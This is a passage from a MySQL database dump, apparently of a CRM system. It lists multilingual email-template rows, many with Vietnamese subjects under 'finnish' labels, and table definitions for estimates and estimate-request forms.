(2832, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'norwegian', 'Spreadsheet share assigned client [norwegian]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2833, 'contract', 'contract-sign-reminder', 'norwegian', 'Contract Sign Reminder (Sent to Customer) [norwegian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2834, 'contract', 'contract-sign-reminder', 'greek', 'Contract Sign Reminder (Sent to Customer) [greek]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2835, 'contract', 'contract-sign-reminder', 'catalan', 'Contract Sign Reminder (Sent to Customer) [catalan]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2836, 'contract', 'contract-sign-reminder', 'german', 'Contract Sign Reminder (Sent to Customer) [german]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2837, 'contract', 'contract-sign-reminder', 'chinese', 'Contract Sign Reminder (Sent to Customer) [chinese]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2838, 'contract', 'contract-sign-reminder', 'vietnamese', 'Contract Sign Reminder (Sent to Customer) [vietnamese]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2839, 'contract', 'contract-sign-reminder', 'indonesia', 'Contract Sign Reminder (Sent to Customer) [indonesia]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2840, 'contract', 'contract-sign-reminder', 'french', 'Contract Sign Reminder (Sent to Customer) [french]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2841, 'contract', 'contract-sign-reminder', 'czech', 'Contract Sign Reminder (Sent to Customer) [czech]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2842, 'contract', 'contract-sign-reminder', 'romanian', 'Contract Sign Reminder (Sent to Customer) [romanian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2843, 'contract', 'contract-sign-reminder', 'polish', 'Contract Sign Reminder (Sent to Customer) [polish]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2844, 'contract', 'contract-sign-reminder', 'ukrainian', 'Contract Sign Reminder (Sent to Customer) [ukrainian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2845, 'contract', 'contract-sign-reminder', 'persian', 'Contract Sign Reminder (Sent to Customer) [persian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0);
INSERT INTO `tblemailtemplates` (`emailtemplateid`, `type`, `slug`, `language`, `name`, `subject`, `message`, `fromname`, `fromemail`, `plaintext`, `active`, `order`) VALUES
(2846, 'contract', 'contract-sign-reminder', 'japanese', 'Contract Sign Reminder (Sent to Customer) [japanese]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2847, 'contract', 'contract-sign-reminder', 'spanish', 'Contract Sign Reminder (Sent to Customer) [spanish]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2848, 'client', 'new-client-created', 'finnish', 'New Contact Added/Registered (Welcome Email) [finnish]', 'Welcome aboard', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2849, 'invoice', 'invoice-send-to-client', 'finnish', 'Send Invoice to Customer [finnish]', 'Hoa don so {invoice_number}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2850, 'ticket', 'new-ticket-opened-admin', 'finnish', 'New Ticket Opened (Opened by Staff, Sent to Customer) [finnish]', 'Yêu cầu Hỗ Trợ Mới gởi đến bạn', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2851, 'ticket', 'ticket-reply', 'finnish', 'Ticket Reply (Sent to Customer) [finnish]', 'Hỗ trợ khách hàng | Phản hồi thông tin | Tổ chức đào tạo WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2852, 'ticket', 'ticket-autoresponse', 'finnish', 'New Ticket Opened - Autoresponse [finnish]', 'Phản hồi hỗ trợ khách hàng | Đã được tạo mới ', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2853, 'invoice', 'invoice-payment-recorded', 'finnish', 'Invoice Payment Recorded (Sent to Customer) [finnish]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2854, 'invoice', 'invoice-overdue-notice', 'finnish', 'Invoice Overdue Notice [finnish]', 'Invoice Overdue Notice - {invoice_number}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2855, 'invoice', 'invoice-already-send', 'finnish', 'Invoice Already Sent to Customer [finnish]', 'Invoice # {invoice_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2856, 'ticket', 'new-ticket-created-staff', 'finnish', 'New Ticket Created (Opened by Customer, Sent to Staff Members) [finnish]', 'Đã tạo một yêu cầu Hỗ trợ mới | Tổ chức đào tạo WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2857, 'estimate', 'estimate-send-to-client', 'finnish', 'Send Estimate to Customer [finnish]', 'Yeu cau bao gia So: # {estimate_number} ', '', '{companyname} |  yêu cầu', NULL, 0, 0, 0),
(2858, 'ticket', 'ticket-reply-to-admin', 'finnish', 'Ticket Reply (Sent to Staff) [finnish]', 'Trả lời mới | Yêu cầu hỗ trợ', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2859, 'estimate', 'estimate-already-send', 'finnish', 'Estimate Already Sent to Customer [finnish]', 'Estimate # {estimate_number} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2860, 'contract', 'contract-expiration', 'finnish', 'Contract Expiration Reminder (Sent to Customer Contacts) [finnish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2861, 'tasks', 'task-assigned', 'finnish', 'New Task Assigned (Sent to Staff) [finnish]', 'NHIỆM VỤ MỚI được giao - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2862, 'tasks', 'task-added-as-follower', 'finnish', 'Staff Member Added as Follower on Task (Sent to Staff) [finnish]', 'Bạn được thêm làm người theo dõi trong nhiệm vụ  - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2863, 'tasks', 'task-commented', 'finnish', 'New Comment on Task (Sent to Staff) [finnish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2864, 'tasks', 'task-added-attachment', 'finnish', 'New Attachment(s) on Task (Sent to Staff) [finnish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2865, 'estimate', 'estimate-declined-to-staff', 'finnish', 'Estimate Declined (Sent to Staff) [finnish]', 'Customer Declined Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2866, 'estimate', 'estimate-accepted-to-staff', 'finnish', 'Estimate Accepted (Sent to Staff) [finnish]', 'Customer Accepted Estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2867, 'proposals', 'proposal-client-accepted', 'finnish', 'Customer Action - Accepted (Sent to Staff) [finnish]', 'Customer Accepted Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2868, 'proposals', 'proposal-send-to-customer', 'finnish', 'Send Proposal to Customer [finnish]', 'De xuat bao gia so {proposal_number} - Tổ chức đào tạo WIT nhà cung cấp quạt mát toàn diện', '', '{companyname} | Tổ chức đào tạo WIT', NULL, 0, 0, 0),
(2869, 'proposals', 'proposal-client-declined', 'finnish', 'Customer Action - Declined (Sent to Staff) [finnish]', 'Client Declined Proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2870, 'proposals', 'proposal-client-thank-you', 'finnish', 'Thank You Email (Sent to Customer After Accept) [finnish]', 'Thank for you accepting proposal', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2871, 'proposals', 'proposal-comment-to-client', 'finnish', 'New Comment  (Sent to Customer/Lead) [finnish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2872, 'proposals', 'proposal-comment-to-admin', 'finnish', 'New Comment (Sent to Staff)  [finnish]', 'New Proposal Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2873, 'estimate', 'estimate-thank-you-to-customer', 'finnish', 'Thank You Email (Sent to Customer After Accept) [finnish]', 'Thank for you accepting estimate', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2874, 'tasks', 'task-deadline-notification', 'finnish', 'Task Deadline Reminder - Sent to Assigned Members [finnish]', 'NHẮC NHỞ - thời hạn nhiệm vụ | {companyname}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2875, 'contract', 'send-contract', 'finnish', 'Send Contract to Customer [finnish]', 'Contract - {contract_subject}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2876, 'invoice', 'invoice-payment-recorded-to-staff', 'finnish', 'Invoice Payment Recorded (Sent to Staff) [finnish]', 'Xác nhận thanh toán - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2877, 'ticket', 'auto-close-ticket', 'finnish', 'Auto Close Ticket [finnish]', 'Ticket Auto Closed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2878, 'project', 'new-project-discussion-created-to-staff', 'finnish', 'New Project Discussion (Sent to Project Members) [finnish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2879, 'project', 'new-project-discussion-created-to-customer', 'finnish', 'New Project Discussion (Sent to Customer Contacts) [finnish]', 'New Project Discussion Created - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2880, 'project', 'new-project-file-uploaded-to-customer', 'finnish', 'New Project File(s) Uploaded (Sent to Customer Contacts) [finnish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2881, 'project', 'new-project-file-uploaded-to-staff', 'finnish', 'New Project File(s) Uploaded (Sent to Project Members) [finnish]', 'New Project File(s) Uploaded - {project_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2882, 'project', 'new-project-discussion-comment-to-customer', 'finnish', 'New Discussion Comment  (Sent to Customer Contacts) [finnish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2883, 'project', 'new-project-discussion-comment-to-staff', 'finnish', 'New Discussion Comment (Sent to Project Members) [finnish]', 'New Discussion Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2884, 'project', 'staff-added-as-project-member', 'finnish', 'Staff Added as Project Member [finnish]', 'New project assigned to you', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2885, 'estimate', 'estimate-expiry-reminder', 'finnish', 'Estimate Expiration Reminder [finnish]', 'Nhắc nhở hết hạn | Đề Xuất Báo Giá', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2886, 'proposals', 'proposal-expiry-reminder', 'finnish', 'Proposal Expiration Reminder [finnish]', 'Proposal Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2887, 'staff', 'new-staff-created', 'finnish', 'New Staff Created (Welcome Email) [finnish]', 'Nhan vien moi da duoc tao', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2888, 'client', 'contact-forgot-password', 'finnish', 'Forgot Password [finnish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2889, 'client', 'contact-password-reseted', 'finnish', 'Password Reset - Confirmation [finnish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2890, 'client', 'contact-set-password', 'finnish', 'Set New Password [finnish]', 'Set new password on {companyname} ', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2891, 'staff', 'staff-forgot-password', 'finnish', 'Forgot Password [finnish]', 'Create New Password', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2892, 'staff', 'staff-password-reseted', 'finnish', 'Password Reset - Confirmation [finnish]', 'Your password has been changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2893, 'project', 'assigned-to-project', 'finnish', 'New Project Created (Sent to Customer Contacts) [finnish]', 'New Project Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2894, 'tasks', 'task-added-attachment-to-contacts', 'finnish', 'New Attachment(s) on Task (Sent to Customer Contacts) [finnish]', 'New Attachment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2895, 'tasks', 'task-commented-to-contacts', 'finnish', 'New Comment on Task (Sent to Customer Contacts) [finnish]', 'New Comment on Task - {task_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2896, 'leads', 'new-lead-assigned', 'finnish', 'New Lead Assigned to Staff Member [finnish]', 'Khách hàng tiềm năng {lead_name}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2897, 'client', 'client-statement', 'finnish', 'Statement - Account Summary [finnish]', 'Account Statement from {statement_from} to {statement_to}', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2898, 'ticket', 'ticket-assigned-to-admin', 'finnish', 'New Ticket Assigned (Sent to Staff) [finnish]', 'Phiếu hỗ trợ mới - đã được chỉ định cho bạn', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2899, 'client', 'new-client-registered-to-admin', 'finnish', 'New Customer Registration (Sent to admins) [finnish]', 'New Customer Registration', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2900, 'leads', 'new-web-to-lead-form-submitted', 'finnish', 'Web to lead form submitted - Sent to lead [finnish]', '{lead_name} - Chúng tôi đã nhận được yêu cầu của bạn', '', '{companyname} | Tổ chức đào tạo WIT', NULL, 0, 0, 0),
(2901, 'staff', 'two-factor-authentication', 'finnish', 'Two Factor Authentication [finnish]', 'Confirm Your Login', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2902, 'project', 'project-finished-to-customer', 'finnish', 'Project Marked as Finished (Sent to Customer Contacts) [finnish]', 'Project Marked as Finished', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2903, 'credit_note', 'credit-note-send-to-client', 'finnish', 'Send Credit Note To Email [finnish]', 'Credit Note With Number #{credit_note_number} Created', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2904, 'tasks', 'task-status-change-to-staff', 'finnish', 'Task Status Changed (Sent to Staff) [finnish]', 'NHẮC NHỞ | Công việc phân công - WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2905, 'tasks', 'task-status-change-to-contacts', 'finnish', 'Task Status Changed (Sent to Customer Contacts) [finnish]', 'Task Status Changed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2906, 'staff', 'reminder-email-staff', 'finnish', 'Staff Reminder Email [finnish]', 'You Have a New Reminder!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2907, 'contract', 'contract-comment-to-client', 'finnish', 'New Comment  (Sent to Customer Contacts) [finnish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2908, 'contract', 'contract-comment-to-admin', 'finnish', 'New Comment (Sent to Staff)  [finnish]', 'New Contract Comment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2909, 'subscriptions', 'send-subscription', 'finnish', 'Send Subscription to Customer [finnish]', 'Đăng ký đã được tạo {companyname}', '', '{companyname} | CRM', NULL, 1, 0, 0),
(2910, 'subscriptions', 'subscription-payment-failed', 'finnish', 'Subscription Payment Failed [finnish]', 'Your most recent invoice payment failed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2911, 'subscriptions', 'subscription-canceled', 'finnish', 'Subscription Canceled (Sent to customer primary contact) [finnish]', 'Your subscription has been canceled', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2912, 'subscriptions', 'subscription-payment-succeeded', 'finnish', 'Subscription Payment Succeeded (Sent to customer primary contact) [finnish]', 'Subscription  Payment Receipt - {subscription_name}', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2913, 'contract', 'contract-expiration-to-staff', 'finnish', 'Contract Expiration Reminder (Sent to Staff) [finnish]', 'Contract Expiration Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2914, 'gdpr', 'gdpr-removal-request', 'finnish', 'Removal Request From Contact (Sent to administrators) [finnish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2915, 'gdpr', 'gdpr-removal-request-lead', 'finnish', 'Removal Request From Lead (Sent to administrators) [finnish]', 'Data Removal Request Received', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2916, 'client', 'client-registration-confirmed', 'finnish', 'Customer Registration Confirmed [finnish]', 'Your registration is confirmed', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2917, 'contract', 'contract-signed-to-staff', 'finnish', 'Contract Signed (Sent to Staff) [finnish]', 'Customer Signed a Contract', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2918, 'subscriptions', 'customer-subscribed-to-staff', 'finnish', 'Customer Subscribed to a Subscription (Sent to administrators and subscription creator) [finnish]', 'Customer Subscribed to a Subscription', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2919, 'client', 'contact-verification-email', 'finnish', 'Email Verification (Sent to Contact After Registration) [finnish]', 'Verify Email Address', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2920, 'client', 'new-customer-profile-file-uploaded-to-staff', 'finnish', 'New Customer Profile File(s) Uploaded (Sent to Staff) [finnish]', 'Customer Uploaded New File(s) in Profile', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2921, 'staff', 'event-notification-to-staff', 'finnish', 'Event Notification (Calendar) [finnish]', 'Upcoming Event - {event_title}', '', '', NULL, 0, 1, 0),
(2922, 'subscriptions', 'subscription-payment-requires-action', 'finnish', 'Credit Card Authorization Required - SCA [finnish]', 'Important: Confirm your subscription {subscription_name} payment', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2923, 'invoice', 'invoice-due-notice', 'finnish', 'Invoice Due Notice [finnish]', 'Your {invoice_number} will be due soon', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2924, 'estimate_request', 'estimate-request-submitted-to-staff', 'finnish', 'Estimate Request Submitted (Sent to Staff) [finnish]', 'Yêu cầu Tư Vấn - Hỗ Trợ mới đã được gửi cho bạn', '', '{companyname} | CRM Tổ chức đào tạo WIT', NULL, 0, 1, 0),
(2925, 'estimate_request', 'estimate-request-assigned', 'finnish', 'Estimate Request Assigned (Sent to Staff) [finnish]', 'New Estimate Request Assigned', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2926, 'estimate_request', 'estimate-request-received-to-user', 'finnish', 'Estimate Request Received (Sent to User) [finnish]', 'Estimate Request Received', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2927, 'inventory_warning', 'inventory-warning-to-staff', 'finnish', 'Inventory warning (Sent to staff) [finnish]', 'Inventory warning', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2928, 'purchase_order', 'purchase-order-to-contact', 'finnish', 'Purchase Order (Sent to contact) [finnish]', 'Đơn đặt hàng {po_number} | WIT', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2929, 'appointly', 'appointment-cron-reminder-to-staff', 'finnish', 'Appointment reminder (Sent to Staff and Attendees) [finnish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2930, 'appointly', 'appointment-recurring-to-staff', 'finnish', 'Appointment recurring (Sent to Staff and Attendees) [finnish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2931, 'appointly', 'appointment-cancelled-to-staff', 'finnish', 'Appointment cancelled (Sent to Staff and Attendees) [finnish]', 'Appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2932, 'appointly', 'appointment-cancelled-to-contact', 'finnish', 'Appointment cancelled (Sent to Contact) [finnish]', 'Your appointment has been cancelled!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2933, 'appointly', 'appointment-cron-reminder-to-contact', 'finnish', 'Appointment reminder (Sent to Contact) [finnish]', 'You have an upcoming appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2934, 'appointly', 'appointment-recurring-to-contacts', 'finnish', 'Appointment recurring (Sent to Contact) [finnish]', 'Recurring appointment was re-created!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2935, 'appointly', 'appointment-approved-to-staff', 'finnish', 'Appointment approved (Sent to Staff and Atendees) [finnish]', 'You are added as a appointment attendee!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2936, 'appointly', 'appointment-approved-to-contact', 'finnish', 'Appointment approved (Sent to Contact) [finnish]', 'Your appointment has been approved!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2937, 'appointly', 'appointment-submitted-to-staff', 'finnish', 'New appointment request (Sent to Responsible Person) [finnish]', 'New appointment request via external form!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2938, 'appointly', 'callback-assigned-to-staff', 'finnish', 'Assigned to callback (Sent to Staff) [finnish]', 'You have been assigned to handle a new callback!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2939, 'appointly', 'newcallback-requested-to-staff', 'finnish', 'New callback request (Sent to Callbacks Responsible Person) [finnish]', 'You have a new callback request!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2940, 'appointly', 'appointly-appointment-request-feedback', 'finnish', 'Request Appointment Feedback (Sent to Client) [finnish]', 'Feedback request for appointment!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2941, 'appointly', 'appointly-appointment-feedback-received', 'finnish', 'New Feedback Received (Sent to Responsible Person) [finnish]', 'New appointment feedback rating received!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2942, 'appointly', 'appointly-appointment-feedback-updated', 'finnish', 'Feedback Updated (Sent to Responsible Person) [finnish]', 'Appointment feedback rating updated!', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2943, 'approve', 'send-request-approve', 'finnish', 'Send Approval Request [finnish]', 'Require Approval', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2944, 'approve', 'send_rejected', 'finnish', 'Send Rejected [finnish]', 'The {object_type} has been rejected', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2945, 'approve', 'send_approve', 'finnish', 'Send Approve [finnish]', 'The {object_type} has been approved', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2946, 'notifications', 'non-billed-tasks-reminder', 'finnish', 'Non-billed tasks reminder (sent to selected staff members) [finnish]', 'Action required: Completed tasks are not billed', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2947, 'invoice', 'invoices-batch-payments', 'finnish', 'Invoices Payments Recorded in Batch (Sent to Customer) [finnish]', 'We have received your payments', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2948, 'purchase_order', 'purchase-request-to-contact', 'finnish', 'Purchase Request (Sent to contact) [finnish]', 'Purchase Request', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2949, 'purchase_order', 'purchase-quotation-to-contact', 'finnish', 'Purchase Quotation (Sent to contact) [finnish]', 'Purchase Quotation', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2950, 'purchase_order', 'debit-note-to-contact', 'finnish', 'Debit Note (Sent to contact) [finnish]', 'Debit Note', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2951, 'purchase_order', 'purchase-statement-to-contact', 'finnish', 'Purchase Statement (Sent to contact) [finnish]', 'Purchase Statement', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2952, 'omni_sales', 'purchase-receipt', 'finnish', 'Purchase receipt (Sent to customer) [finnish]', 'Purchase receipt', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2953, 'omni_sales', 'pre-orders-notify', 'finnish', 'Pre-orders notify (Sent to seller) [finnish]', 'Pre-orders notify', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2954, 'omni_sales', 'pre-orders-handover', 'finnish', 'Pre-orders handover [finnish]', 'Pre-orders handover', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2955, 'loyalty', 'loyalty-new-account-bonus-point', 'finnish', 'Loyalty new account bonus point (Sent to contact) [finnish]', 'New account bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2956, 'loyalty', 'loyalty-birthday-bonus-point', 'finnish', 'Loyalty birthday bonus point (Sent to contact) [finnish]', 'Birthday bonus point', '', '{companyname} | CRM', NULL, 0, 0, 0),
(2957, 'client', 'reminder-send-to-contact', 'finnish', 'Reminder [finnish]', 'New Reminder', '', '', NULL, 0, 1, 0),
(2958, 'client', 'reminder-service-send-to-contact', 'finnish', 'Services [finnish]', 'New Service', '', '', NULL, 0, 1, 0),
(2959, 'spreadsheet_online', 'spreadsheet-share-assigned', 'finnish', 'Spreadsheet share assigned [finnish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2960, 'spreadsheet_online', 'spreadsheet-share-assigned-client', 'finnish', 'Spreadsheet share assigned client [finnish]', 'Spreadsheet Online - Share {type_spreadsheet} For You', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2961, 'contract', 'contract-sign-reminder', 'finnish', 'Contract Sign Reminder (Sent to Customer) [finnish]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2962, 'contract', 'contract-sign-reminder', 'italian', 'Contract Sign Reminder (Sent to Customer) [italian]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2963, 'contract', 'contract-sign-reminder', 'slovak', 'Contract Sign Reminder (Sent to Customer) [slovak]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0),
(2964, 'contract', 'contract-sign-reminder', 'portuguese_br', 'Contract Sign Reminder (Sent to Customer) [portuguese_br]', 'Contract Sign Reminder', '', '{companyname} | CRM', NULL, 0, 1, 0);

-- --------------------------------------------------------

--
-- Table structure for table `tblestimates`
--

CREATE TABLE `tblestimates` (
  `id` int(11) NOT NULL,
  `sent` tinyint(1) NOT NULL DEFAULT 0,
  `datesend` datetime DEFAULT NULL,
  `clientid` int(11) NOT NULL,
  `deleted_customer_name` varchar(100) DEFAULT NULL,
  `project_id` int(11) NOT NULL DEFAULT 0,
  `number` int(11) NOT NULL,
  `prefix` varchar(50) DEFAULT NULL,
  `number_format` int(11) NOT NULL DEFAULT 0,
  `hash` varchar(32) DEFAULT NULL,
  `datecreated` datetime NOT NULL,
  `date` date NOT NULL,
  `expirydate` date DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `total` decimal(15,2) NOT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) NOT NULL,
  `status` int(11) NOT NULL DEFAULT 1,
  `clientnote` text DEFAULT NULL,
  `adminnote` text DEFAULT NULL,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` varchar(30) DEFAULT NULL,
  `invoiceid` int(11) DEFAULT NULL,
  `invoiced_date` datetime DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `reference_no` varchar(100) DEFAULT NULL,
  `sale_agent` int(11) NOT NULL DEFAULT 0,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) NOT NULL,
  `show_shipping_on_estimate` tinyint(1) NOT NULL DEFAULT 1,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `pipeline_order` int(11) DEFAULT 1,
  `is_expiry_notified` int(11) NOT NULL DEFAULT 0,
  `acceptance_firstname` varchar(50) DEFAULT NULL,
  `acceptance_lastname` varchar(50) DEFAULT NULL,
  `acceptance_email` varchar(100) DEFAULT NULL,
  `acceptance_date` datetime DEFAULT NULL,
  `acceptance_ip` varchar(40) DEFAULT NULL,
  `signature` varchar(40) DEFAULT NULL,
  `short_link` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblestimate_requests`
--

CREATE TABLE `tblestimate_requests` (
  `id` int(10) UNSIGNED NOT NULL,
  `email` varchar(100) NOT NULL,
  `submission` longtext NOT NULL,
  `last_status_change` datetime DEFAULT NULL,
  `date_estimated` datetime DEFAULT NULL,
  `from_form_id` int(11) DEFAULT NULL,
  `assigned` int(11) DEFAULT NULL,
  `status` int(11) DEFAULT NULL,
  `default_language` int(11) NOT NULL,
  `date_added` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblestimate_request_forms`
--

CREATE TABLE `tblestimate_request_forms` (
  `id` int(10) UNSIGNED NOT NULL,
  `form_key` varchar(32) NOT NULL,
  `type` varchar(100) NOT NULL,
  `name` varchar(191) NOT NULL,
  `form_data` mediumtext DEFAULT NULL,
  `recaptcha` int(11) DEFAULT NULL,
  `status` int(11) NOT NULL,
  `submit_btn_name` varchar(100) DEFAULT NULL,
  `submit_btn_bg_color` varchar(10) DEFAULT '#84c529',
  `submit_btn_text_color` varchar(10) DEFAULT '#ffffff',
  `success_submit_msg` text DEFAULT NULL,
  `submit_action` int(11) DEFAULT 0,
  `submit_redirect_url` mediumtext DEFAULT NULL,
  `language` varchar(100) DEFAULT NULL,
  `dateadded` datetime DEFAULT NULL,
  `notify_type` varchar(100) DEFAULT NULL,
  `notify_ids` mediumtext DEFAULT NULL,
  `responsible` int(11) DEFAULT NULL,
